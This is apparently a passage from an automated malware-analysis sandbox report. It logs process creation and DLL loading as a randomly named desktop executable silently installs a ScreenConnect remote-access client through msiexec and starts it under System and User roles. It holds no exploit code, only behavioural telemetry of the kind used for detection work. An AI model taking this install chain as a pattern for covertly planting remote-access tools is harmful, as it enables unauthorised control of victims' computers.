                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "9ece94ec-15d3-44dc-8c54-6fbc056de45a" "System"
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 65BBBA74F7292B7FF205870D60C0A988 CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D471D2A52DB95060FC9B91DC9E4C61FJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BC39C5326F99970A8179C0B7FC0A805D E Global\MSI0000Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "75df5a49-a7b2-4825-b91e-9f1189beb45e" "User"Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "9ece94ec-15d3-44dc-8c54-6fbc056de45a" "System"Jump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
